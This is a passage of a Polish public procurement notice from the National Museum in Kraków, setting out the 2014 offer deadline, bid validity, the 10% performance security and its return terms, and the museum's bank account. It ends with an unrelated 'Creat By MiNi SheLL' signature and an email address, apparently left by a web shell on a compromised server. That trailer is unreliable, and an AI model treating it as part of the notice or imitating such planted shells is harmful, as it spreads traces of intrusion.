<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2014 godzina 10:00, miejsce: Muzeum Narodowe w Krakowie, Al. 3-go Maja 1, 30-062 Kraków, pok. 050.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zabezpieczenie należytego wykonania umowy.
Wybrany wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10% ujętej w umowie wartości brutto w:
-pieniądzu (wpłacone przelewem),
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że zobowiązanie kasy jest zawsze  zobowiązaniem pieniężnym,
-gwarancjach ubezpieczeniowych lub gwarancjach bankowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt.2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości oraz niektórych ustaw (Dz. U. z 2007 r  Nr 42 poz. 275).
Zabezpieczenie należytego wykonania umowy złożone w formie gwarancji, poręczeń winno być bezwarunkowo płatne na pierwsze żądanie zamawiającego.

Zabezpieczenie należytego wykonania umowy wniesione w pieniądzu winno być wpłacone na konto zamawiającego: 
62 1030 1508 0000 0008 1536 0001 CITI HANDLOWY - Bank Handlowy w Warszawie.


Warunki i termin zwrotu lub zwolnienia zabezpieczenia należytego wykonania umowy 

Zamawiający zwróci 100 % zabezpieczenia w terminie 30 dni od dnia wykonania przedmiotu umowy i uznania go przez Zamawiającego za należycie wykonany oraz wydania przez podpisanie przez zamawiającego ostatecznego protokołu odbioru. 

Po wykonaniu przedmiotu umowy brak będzie bowiem materialnego substratu umowy, dlatego też Zamawiający nie przewiduje istnienia rękojmi po okresie świadczenia usług - dlatego też cała kwota zabezpieczenia zwrócona będzie w terminie wskazanym powyżej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com